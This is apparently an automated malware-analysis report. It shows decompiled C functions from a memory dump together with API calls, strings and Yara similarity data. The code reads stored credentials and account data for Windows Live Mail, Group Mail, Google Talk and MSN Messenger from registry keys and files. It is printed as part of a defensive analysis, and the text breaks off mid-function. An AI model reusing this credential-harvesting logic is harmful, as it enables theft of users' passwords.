                                                                                              				_t66 = 0x1c;
                                                                                              				E0040EE59(_t61, _t66);
                                                                                              				E00406734(_t61, "\\Microsoft\\Windows Live Mail");
                                                                                              				E00410C43(_a4, _t75, _t61); // executed
                                                                                              				_v276 = 0;
                                                                                              				memset( &_v275, 0, 0x104);
                                                                                              				_v540 = 0;
                                                                                              				memset( &_v539, 0, 0x104);
                                                                                              				E0040EBC1(_a4, 0x80000001, "Software\\Microsoft\\Windows Live Mail", "Store Root",  &_v276, 0x104); // executed
                                                                                              				_t74 = (_t68 & 0xfffffff8) - 0x31c + 0x38;
                                                                                              				ExpandEnvironmentStringsA( &_v276,  &_v540, 0x104);
                                                                                              				_t44 = strlen( &_v540);
                                                                                              				if(_t44 > 0) {
                                                                                              					_t48 = _t74 + _t44 + 0x117;
                                                                                              					if( *_t48 == 0x5c) {
                                                                                              						 *_t48 = 0;
                                                                                              					}
                                                                                              				}
                                                                                              				_push( &_v532);
                                                                                              				_t46 =  &_v796;
                                                                                              				_push(_t46);
                                                                                              				L004115B2();
                                                                                              				_t78 = _t46;
                                                                                              				if(_t46 != 0) {
                                                                                              					_t46 = E00410C43(_a4, _t78,  &_v532); // executed
                                                                                              				}
                                                                                              				return _t46;
                                                                                              			}


                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00410D3C
                                                                                                • Part of subcall function 00406734: strlen.MSVCRT ref: 00406736
                                                                                                • Part of subcall function 00406734: strlen.MSVCRT ref: 00406741
                                                                                                • Part of subcall function 00406734: strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758
                                                                                                • Part of subcall function 0040EE59: memset.MSVCRT ref: 0040EEAE
                                                                                                • Part of subcall function 0040EE59: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
                                                                                                • Part of subcall function 0040EE59: strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25
                                                                                              • memset.MSVCRT ref: 00410DAA
                                                                                              • memset.MSVCRT ref: 00410DC5
                                                                                                • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                              • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 00410DFE
                                                                                              • strlen.MSVCRT ref: 00410E0C
                                                                                              • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?,?), ref: 00410E32
                                                                                              Strings
                                                                                              • \Microsoft\Windows Live Mail, xrefs: 00410D81
                                                                                              • Software\Microsoft\Windows Live Mail, xrefs: 00410DDB
                                                                                              • \Microsoft\Windows Mail, xrefs: 00410D5A
                                                                                              • Store Root, xrefs: 00410DD6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$strlen$Close$EnvironmentExpandStrings_stricmpstrcatstrcpy
                                                                                              • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                              • API String ID: 4071991895-2578778931
                                                                                              • Opcode ID: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
                                                                                              • Instruction ID: 656a87abbde68b626b6b67706479efffa51c3f1aad4b8967eb2d69b922da332e
                                                                                              • Opcode Fuzzy Hash: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
                                                                                              • Instruction Fuzzy Hash: 3D318DB2548348ABD324E799DC46FCB77DC9BC4318F04482FF649D7182E678D68487AA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 76%
                                                                                              			E004037B1(void* __ecx, void* __edi, void* __fp0, intOrPtr _a4) {
                                                                                              				char _v276;
                                                                                              				char _v404;
                                                                                              				intOrPtr _v408;
                                                                                              				char _v792;
                                                                                              				intOrPtr _v796;
                                                                                              				char _v924;
                                                                                              				char _v936;
                                                                                              				void _v1959;
                                                                                              				char _v1960;
                                                                                              				void _v2983;
                                                                                              				char _v2984;
                                                                                              				void* __ebx;
                                                                                              				void* __esi;
                                                                                              				void* _t28;
                                                                                              				void* _t50;
                                                                                              				void* _t51;
                                                                                              				char* _t59;
                                                                                              				char* _t63;
                                                                                              				void* _t70;
                                                                                              
                                                                                              				_t70 = __fp0;
                                                                                              				_t51 = __ecx;
                                                                                              				_v1960 = 0;
                                                                                              				memset( &_v1959, 0, 0x3ff);
                                                                                              				_v2984 = 0;
                                                                                              				memset( &_v2983, 0, 0x3ff);
                                                                                              				_t28 = E00410F79(_t51,  &_v2984,  &_v1960); // executed
                                                                                              				if(_t28 == 0) {
                                                                                              					return _t28;
                                                                                              				}
                                                                                              				E004021D8( &_v936);
                                                                                              				_push( &_v1960);
                                                                                              				_t50 = 0x7f;
                                                                                              				E004060D0(_t50,  &_v276);
                                                                                              				_t59 =  &_v404;
                                                                                              				E004060D0(_t50, _t59,  &_v2984);
                                                                                              				_v796 = 9;
                                                                                              				_v408 = 3;
                                                                                              				_t63 = strchr(_t59, 0x40);
                                                                                              				_push( &_v404);
                                                                                              				if(_t63 == 0) {
                                                                                              					if(strlen() + 0xa < 0) {
                                                                                              						sprintf( &_v792, "%s@yahoo.com",  &_v404);
                                                                                              					}
                                                                                              				} else {
                                                                                              					strcpy( &_v792, ??);
                                                                                              					 *_t63 = 0;
                                                                                              				}
                                                                                              				strcpy( &_v924,  &_v404);
                                                                                              				return E00402407( &_v936, _t70, _a4);
                                                                                              			}























                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004037D2
                                                                                              • memset.MSVCRT ref: 004037E6
                                                                                                • Part of subcall function 00410F79: memset.MSVCRT ref: 00410F9B
                                                                                                • Part of subcall function 00410F79: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007
                                                                                                • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                                • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                              • strchr.MSVCRT ref: 00403855
                                                                                              • strcpy.MSVCRT(?,?,?,?,?), ref: 00403872
                                                                                              • strlen.MSVCRT ref: 0040387E
                                                                                              • sprintf.MSVCRT ref: 0040389E
                                                                                              • strcpy.MSVCRT(?,?,?,?,?), ref: 004038B4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$strcpystrlen$Closememcpysprintfstrchr
                                                                                              • String ID: %s@yahoo.com
                                                                                              • API String ID: 1649821605-3288273942
                                                                                              • Opcode ID: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
                                                                                              • Instruction ID: 59c64947ec9ad5e5fa7ad27033647646f0aae9e06f6053b7dc62ef58ab254070
                                                                                              • Opcode Fuzzy Hash: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
                                                                                              • Instruction Fuzzy Hash: 592184B3D0412C6EDB21EB55DD41FDA77AC9F85308F0404EBB64DE6041E6B8AB848BA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E004034CB(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
                                                                                              				void _v267;
                                                                                              				char _v268;
                                                                                              				void _v531;
                                                                                              				char _v532;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* _t15;
                                                                                              				void* _t23;
                                                                                              				char* _t28;
                                                                                              
                                                                                              				_t23 = __ecx;
                                                                                              				_v532 = 0;
                                                                                              				memset( &_v531, 0, 0x104);
                                                                                              				_v268 = 0;
                                                                                              				memset( &_v267, 0, 0x104);
                                                                                              				_t15 = E0040EBC1(_t23, 0x80000002, "Software\\Group Mail", "InstallPath",  &_v532, 0xfa); // executed
                                                                                              				if(_t15 != 0) {
                                                                                              					strcpy( &_v268,  &_v532);
                                                                                              					_t28 =  &_v268;
                                                                                              					E00405F1F(_t28);
                                                                                              					strcat(_t28, "fb.dat");
                                                                                              					return E004033D7(_t28, __fp0, _a4);
                                                                                              				}
                                                                                              				return _t15;
                                                                                              			}













                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004034EB
                                                                                              • memset.MSVCRT ref: 00403501
                                                                                                • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                              • strcpy.MSVCRT(00000000,00000000), ref: 0040353C
                                                                                                • Part of subcall function 00405F1F: strlen.MSVCRT ref: 00405F20
                                                                                                • Part of subcall function 00405F1F: strcat.MSVCRT(00000000,00413044,004062BF,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 00405F37
                                                                                              • strcat.MSVCRT(00000000,fb.dat,00000000,00000000), ref: 00403554
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memsetstrcat$Closestrcpystrlen
                                                                                              • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                              • API String ID: 1387626053-966475738
                                                                                              • Opcode ID: b4206de9c90982f9c66f6cfc9dc9c0c880768121677d473e1c5bd2e45b33c8fe
                                                                                              • Instruction ID: 7ff2b4ee0b8a45595852750e2855a272ac8b2b1e575441dca18af6517dfb7442
                                                                                              • Opcode Fuzzy Hash: b4206de9c90982f9c66f6cfc9dc9c0c880768121677d473e1c5bd2e45b33c8fe
                                                                                              • Instruction Fuzzy Hash: 2E01FC72D8012C75D720E6669C46FDA766C8F64745F0004A6BA4AF20C2DAFCABD48B69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 96%
                                                                                              			E0040754D(void* __ecx, void* __eflags, int _a4, char _a8, char _a12, void _a13, char _a268, void _a269) {
                                                                                              				void* _v0;
                                                                                              				char _v4;
                                                                                              				long _t29;
                                                                                              				void* _t33;
                                                                                              				void* _t36;
                                                                                              				signed int _t54;
                                                                                              				void* _t56;
                                                                                              				void* _t57;
                                                                                              				void* _t58;
                                                                                              
                                                                                              				_t50 = __ecx;
                                                                                              				E004118A0(0x1110, __ecx);
                                                                                              				E0040724C(_a4); // executed
                                                                                              				_t29 = E0040EB3F(0x80000001, "Software\\Google\\Google Talk\\Accounts",  &_v4);
                                                                                              				_t56 = (_t54 & 0xfffffff8) + 0xc;
                                                                                              				if(_t29 == 0) {
                                                                                              					_a4 = 0;
                                                                                              					_a12 = 0;
                                                                                              					memset( &_a13, 0, 0xff);
                                                                                              					_t57 = _t56 + 0xc;
                                                                                              					_t33 = E0040EC05(_v0, 0,  &_a12);
                                                                                              					while(1) {
                                                                                              						_t58 = _t57 + 0xc;
                                                                                              						if(_t33 != 0) {
                                                                                              							break;
                                                                                              						}
                                                                                              						_t36 = E0040EB3F(_v0,  &_a12,  &_a8);
                                                                                              						_t57 = _t58 + 0xc;
                                                                                              						if(_t36 == 0) {
                                                                                              							_a268 = 0;
                                                                                              							memset( &_a269, 0, 0xfff);
                                                                                              							E0040EB80(0xfff, _t50, _a8, "pw",  &_a268);
                                                                                              							_t57 = _t57 + 0x18;
                                                                                              							E00407406( &_a268, _a4,  &_a12);
                                                                                              							RegCloseKey(_v0);
                                                                                              						}
                                                                                              						_a4 = _a4 + 1;
                                                                                              						_t33 = E0040EC05(_v0, _a4,  &_a12);
                                                                                              					}
                                                                                              					_t29 = RegCloseKey(_v0);
                                                                                              				}
                                                                                              				return _t29;
                                                                                              			}













                                                                                              APIs
                                                                                                • Part of subcall function 0040724C: memset.MSVCRT ref: 004072AE
                                                                                                • Part of subcall function 0040724C: memset.MSVCRT ref: 004072C2
                                                                                                • Part of subcall function 0040724C: memset.MSVCRT ref: 004072DC
                                                                                                • Part of subcall function 0040724C: memset.MSVCRT ref: 004072F1
                                                                                                • Part of subcall function 0040724C: GetComputerNameA.KERNEL32(?,?), ref: 00407313
                                                                                                • Part of subcall function 0040724C: GetUserNameA.ADVAPI32(?,?), ref: 00407327
                                                                                                • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407346
                                                                                                • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040735B
                                                                                                • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407364
                                                                                                • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407373
                                                                                                • Part of subcall function 0040724C: memcpy.MSVCRT ref: 00407385
                                                                                                • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                              • memset.MSVCRT ref: 0040759B
                                                                                                • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                                                              • memset.MSVCRT ref: 004075EC
                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 0040762A
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00407651
                                                                                              Strings
                                                                                              • Software\Google\Google Talk\Accounts, xrefs: 0040756C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                                                                              • String ID: Software\Google\Google Talk\Accounts
                                                                                              • API String ID: 2959138223-1079885057
                                                                                              • Opcode ID: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
                                                                                              • Instruction ID: 125b9810afc719f5725a34431a69a8fbc80fc1372edd2e7206a69bc0ee1a9f38
                                                                                              • Opcode Fuzzy Hash: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
                                                                                              • Instruction Fuzzy Hash: 6A21887150820A6FD610EF51DC42DEBB7ECDF94344F00083AF945E1191E635D96D9BA7
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 64%
                                                                                              			E0040A5AC(void* __eax) {
                                                                                              				void* __esi;
                                                                                              				_Unknown_base(*)()* _t26;
                                                                                              				void* _t31;
                                                                                              				intOrPtr _t34;
                                                                                              				char* _t44;
                                                                                              				void* _t45;
                                                                                              				intOrPtr* _t46;
                                                                                              				int _t47;
                                                                                              
                                                                                              				_t45 = __eax;
                                                                                              				_t37 =  *((intOrPtr*)(__eax + 0x37c));
                                                                                              				_t47 = 0;
                                                                                              				if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x37c)) + 0x30)) > 0) {
                                                                                              					do {
                                                                                              						_t31 = E00406DEB(_t47, _t37);
                                                                                              						_push(_t31);
                                                                                              						_push("/sort");
                                                                                              						L004115C4();
                                                                                              						if(_t31 == 0) {
                                                                                              							_t4 = _t47 + 1; // 0x1
                                                                                              							_t44 = E00406DEB(_t4,  *((intOrPtr*)(_t45 + 0x37c)));
                                                                                              							_t54 =  *_t44 - 0x7e;
                                                                                              							_t34 =  *((intOrPtr*)(_t45 + 0x370));
                                                                                              							if( *_t44 != 0x7e) {
                                                                                              								_push(0);
                                                                                              							} else {
                                                                                              								_push(1);
                                                                                              								_t44 = _t44 + 1;
                                                                                              							}
                                                                                              							_push(_t44);
                                                                                              							E0040A119(_t34, _t54);
                                                                                              						}
                                                                                              						_t37 =  *((intOrPtr*)(_t45 + 0x37c));
                                                                                              						_t47 = _t47 + 1;
                                                                                              					} while (_t47 <  *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x37c)) + 0x30)));
                                                                                              				}
                                                                                              				E00405E2C();
                                                                                              				 *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)) + 0x28)) = 0;
                                                                                              				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)))) + 0x5c))();
                                                                                              				if(E00406DFB( *((intOrPtr*)(_t45 + 0x37c)), "/nosort") == 0xffffffff) {
                                                                                              					_t46 =  *((intOrPtr*)(_t45 + 0x370));
                                                                                              					if( *0x41748c == 0) {
                                                                                              						 *0x417490 =  *((intOrPtr*)(_t46 + 0x1ac));
                                                                                              						 *0x41748c = 1;
                                                                                              					}
                                                                                              					_t26 =  *((intOrPtr*)( *_t46 + 0x60))(E0040A0F3);
                                                                                              					qsort( *((intOrPtr*)( *_t46 + 0x64))(), 0,  *(_t46 + 0x28), _t26);
                                                                                              				}
                                                                                              				return SetCursor( *0x416b98);
                                                                                              			}












                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Cursor_mbsicmpqsort
                                                                                              • String ID: /nosort$/sort
                                                                                              • API String ID: 882979914-1578091866
                                                                                              • Opcode ID: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
                                                                                              • Instruction ID: 1813cf3d9500be1981e9bba0c11058464626672cad6922460886ab76c06e8bc1
                                                                                              • Opcode Fuzzy Hash: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
                                                                                              • Instruction Fuzzy Hash: 4921B071304601EFC719AF75C880A99B7A9BF08314B10017EF429A7291CB39A9628B8A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 25%
                                                                                              			E0040EE59(char* __edi, void* __esi) {
                                                                                              				void* _v8;
                                                                                              				char _v40;
                                                                                              				void _v299;
                                                                                              				char _v300;
                                                                                              				void* _t32;
                                                                                              				char* _t37;
                                                                                              				void* _t38;
                                                                                              
                                                                                              				_t38 = __esi;
                                                                                              				_t37 = __edi;
                                                                                              				E0040EDAC();
                                                                                              				if( *0x41751c == 0 ||  *((intOrPtr*)(E00406278() + 0x10)) == 1 && (__esi == 0x19 || __esi == 0x17 || __esi == 0x16)) {
                                                                                              					_v300 = 0;
                                                                                              					memset( &_v299, 0, 0x103);
                                                                                              					if(_t38 == 0x19 || _t38 == 0x17 || _t38 == 0x16) {
                                                                                              						_push( &_v8);
                                                                                              						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
                                                                                              						_push(0x80000002);
                                                                                              					} else {
                                                                                              						_push( &_v8);
                                                                                              						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
                                                                                              						_push(0x80000001);
                                                                                              					}
                                                                                              					if(E0040EB3F() == 0) {
                                                                                              						E0040EDDB(_t38);
                                                                                              						E0040EB80(0x104,  &_v40, _v8,  &_v40,  &_v300);
                                                                                              						RegCloseKey(_v8);
                                                                                              					}
                                                                                              					strcpy(_t37,  &_v300);
                                                                                              					return 0 |  *_t37 != 0x00000000;
                                                                                              				} else {
                                                                                              					_t32 =  *0x41751c(0, _t37, _t38, 0); // executed
                                                                                              					return _t32;
                                                                                              				}
                                                                                              			}











                                                                                              APIs
                                                                                                • Part of subcall function 0040EDAC: LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,75144DE0,?,00000000), ref: 0040EDBA
                                                                                                • Part of subcall function 0040EDAC: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF
                                                                                              • memset.MSVCRT ref: 0040EEAE
                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
                                                                                              • strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25
                                                                                                • Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                                                              Strings
                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040EEC9, 0040EED9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressCloseLibraryLoadProcVersionmemsetstrcpy
                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                              • API String ID: 181880968-2036018995
                                                                                              • Opcode ID: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
                                                                                              • Instruction ID: b4f7ca4f0d473bdd6f3573a0ab4a655380742daec172f7a18688454dd959f7ad
                                                                                              • Opcode Fuzzy Hash: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
                                                                                              • Instruction Fuzzy Hash: D711D871800219FADB24A656DC89DEF77BCDB04309F1008B7F91572191D63D9FA886DD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040396C(void* __eflags, void* __fp0, intOrPtr _a4) {
                                                                                              				char _v528;
                                                                                              				intOrPtr _v540;
                                                                                              				char _v796;
                                                                                              				char _v1052;
                                                                                              				void* _v1056;
                                                                                              				void* _v1060;
                                                                                              				int _v1064;
                                                                                              				void* __ebx;
                                                                                              				void* __esi;
                                                                                              				void* _t21;
                                                                                              				long _t23;
                                                                                              				void** _t24;
                                                                                              				long _t26;
                                                                                              				int _t32;
                                                                                              				void* _t52;
                                                                                              
                                                                                              				_t52 = __fp0;
                                                                                              				_v540 = 0x412e80;
                                                                                              				E004046D7( &_v528);
                                                                                              				_t32 = 0;
                                                                                              				_v1052 = 0;
                                                                                              				_v796 = 0;
                                                                                              				_v1064 = 0;
                                                                                              				do {
                                                                                              					if(_v1064 != _t32) {
                                                                                              						__eflags = _v1064 - 1;
                                                                                              						if(__eflags != 0) {
                                                                                              							_t21 = E0040D5DB( &_v1052, __eflags); // executed
                                                                                              						} else {
                                                                                              							_t23 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MessengerService", _t32, 0x20019,  &_v1060); // executed
                                                                                              							__eflags = _t23;
                                                                                              							if(_t23 != 0) {
                                                                                              								goto L5;
                                                                                              							} else {
                                                                                              								_t24 =  &_v1060;
                                                                                              								goto L4;
                                                                                              							}
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t26 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MSNMessenger", _t32, 0x20019,  &_v1056); // executed
                                                                                              						if(_t26 != 0) {
                                                                                              							L5:
                                                                                              							_t21 = 0;
                                                                                              						} else {
                                                                                              							_t24 =  &_v1056;
                                                                                              							L4:
                                                                                              							_t21 = E0040D4A6( &_v1052, _t24);
                                                                                              						}
                                                                                              					}
                                                                                              					_t32 = 0;
                                                                                              					if(_t21 != 0) {
                                                                                              						E004038CF(_t52, _a4,  &_v1052);
                                                                                              					}
                                                                                              					_v1064 = _v1064 + 1;
                                                                                              				} while (_v1064 <= 2);
                                                                                              				return E004047F1( &_v528);
                                                                                              			}



















                                                                                              APIs
                                                                                                • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                              • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 004039C5
                                                                                                • Part of subcall function 0040D5DB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
                                                                                                • Part of subcall function 0040D5DB: strlen.MSVCRT ref: 0040D6B7
                                                                                                • Part of subcall function 0040D5DB: strcpy.MSVCRT(?,?), ref: 0040D6C8
                                                                                                • Part of subcall function 0040D5DB: LocalFree.KERNEL32(?), ref: 0040D6D5
                                                                                              • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 004039F7
                                                                                              Strings
                                                                                              • Software\Microsoft\MSNMessenger, xrefs: 004039BF
                                                                                              • Software\Microsoft\MessengerService, xrefs: 004039F1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Openstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                                                              • String ID: Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService
                                                                                              • API String ID: 1910562259-1741179510
                                                                                              • Opcode ID: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
                                                                                              • Instruction ID: e1373b66f94ab8684edf5be4eb08dc620599410c0cc400d8dd4f2e2a864aae35
                                                                                              • Opcode Fuzzy Hash: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
                                                                                              • Instruction Fuzzy Hash: 4F11F6B1608345AEC320DF5188819ABBBEC9B84355F50893FF584A2081D338DA09CAAB
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040ED0B(unsigned int _a4, CHAR* _a8, CHAR* _a12) {
                                                                                              				struct HRSRC__* _t12;
                                                                                              				void* _t16;
                                                                                              				void* _t17;
                                                                                              				signed int _t26;
                                                                                              				signed int _t29;
                                                                                              				signed int _t33;
                                                                                              				struct HRSRC__* _t35;
                                                                                              				signed int _t36;
                                                                                              
                                                                                              				_t12 = FindResourceA(_a4, _a12, _a8); // executed
                                                                                              				_t35 = _t12;
                                                                                              				if(_t35 != 0) {
                                                                                              					_t33 = SizeofResource(_a4, _t35);
                                                                                              					if(_t33 > 0) {
                                                                                              						_t16 = LoadResource(_a4, _t35);
                                                                                              						if(_t16 != 0) {
                                                                                              							_t17 = LockResource(_t16);
                                                                                              							if(_t17 != 0) {
                                                                                              								_a4 = _t33;
                                                                                              								_t29 = _t33 * _t33;
                                                                                              								_t36 = 0;
                                                                                              								_t7 =  &_a4;
                                                                                              								 *_t7 = _a4 >> 2;
                                                                                              								if( *_t7 != 0) {
                                                                                              									do {
                                                                                              										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
                                                                                              										_t36 = _t36 + 1;
                                                                                              										_t29 = _t26;
                                                                                              									} while (_t36 < _a4);
                                                                                              								}
                                                                                              								 *0x417110 =  *0x417110 + _t29 ^ _t33;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				return 1;
                                                                                              			}












                                                                                              APIs
                                                                                              • FindResourceA.KERNEL32(?,?,?), ref: 0040ED18
                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0040ED29
                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 0040ED39
                                                                                              • LockResource.KERNEL32(00000000), ref: 0040ED44
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                              • String ID:
                                                                                              • API String ID: 3473537107-0
                                                                                              • Opcode ID: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
                                                                                              • Instruction ID: 6bf1e5af94a697a74b0619517749427008784a8e56cd275cc50dd62f01ccc87b
                                                                                              • Opcode Fuzzy Hash: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
                                                                                              • Instruction Fuzzy Hash: 450104367002126BCB185F66CD4599B7FAAFF852903488536AD09DA360D770C921C688
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 95%
                                                                                              			E0040EA72(void* __ecx, intOrPtr* __edi, void* __eflags, intOrPtr _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, CHAR* _a20) {
                                                                                              				void _v8199;
                                                                                              				char _v8200;
                                                                                              				void* __ebx;
                                                                                              				int _t23;
                                                                                              				CHAR* _t31;
                                                                                              
                                                                                              				E004118A0(0x2004, __ecx);
                                                                                              				_v8200 = 0;
                                                                                              				if(_a4 == 0) {
                                                                                              					memset( &_v8199, 0, 0x2000);
                                                                                              					GetPrivateProfileStringA(_a8, _a12, 0x412466,  &_v8200, 0x2000, _a20); // executed
                                                                                              					_t23 = E004067DC( &_v8200, __edi, _a16);
                                                                                              				} else {
                                                                                              					memset( &_v8199, 0, 0x2000);
                                                                                              					_t31 =  &_v8200;
                                                                                              					E00406763(_t31, _a16,  *__edi);
